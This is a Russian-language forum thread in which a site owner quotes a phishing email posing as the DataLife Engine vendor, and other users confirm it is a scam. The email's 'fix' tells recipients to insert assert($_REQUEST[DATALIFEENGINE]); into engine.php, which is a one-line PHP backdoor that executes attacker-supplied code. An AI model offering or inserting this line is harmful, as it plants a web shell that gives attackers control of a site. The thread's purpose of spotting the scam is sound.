seregavip 0 Опубликовано: 10 сентября 2014 Рассказать Опубликовано: 10 сентября 2014 Пришло письмо: Уважаемые владельцы сайта, благодарим вас за выбор системы управления сайтом «DataLife Engine». Уведомляем вас о том, что силами наших специалистов была обнаружена критическая уязвимость во всех версиях «DataLife Engine». При помощи данной уязвимости злоумышленники могут легко получить доступ к панели управления уязвимого сайта. Проблема заключается в недостаточной фильтрации данных. Уязвимость является крупнейшей за все 10 лет разработки «DataLife Engine», примерно 90% сайтов на «Data Life Engine» могут быть взломаны при помощи неё. К сожалению, ваш сайт входит в число уязвимых сайтов и может быть взломан в любой момент. Просим вас серьёзно отнестись к данной проблеме и устранить уязвимость, следуя инструкции ниже: Для исправления откройте файл вашего сайта: /engine/engine.php и в самое начало файла после строчки: <?php добавьте: assert($_REQUEST[DATALIFEENGINE]); С уважением, SoftNews Media Group. Новости у вас нет, как я понимаю таким образом хотят сделать чтобы я оставил дыру на сайте? Ссылка на сообщение Поделиться на других сайтах
AkaUfo 2 Опубликовано: 10 сентября 2014 Рассказать Опубликовано: 10 сентября 2014 >> таким образом хотят сделать чтобы я оставил дыру на сайте? Само собой разумеется, посмотрите откуда рассылка шла, она ведь шла не от bags@dle-news.ru, а с вашего же сайта Ссылка на сообщение Поделиться на других сайтах
celsoft 6260 Опубликовано: 11 сентября 2014 Рассказать Опубликовано: 11 сентября 2014 http://forum.dle-news.ru/index.php?showtopic=66594 Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Архивировано
Эта тема находится в архиве и закрыта для публикации сообщений.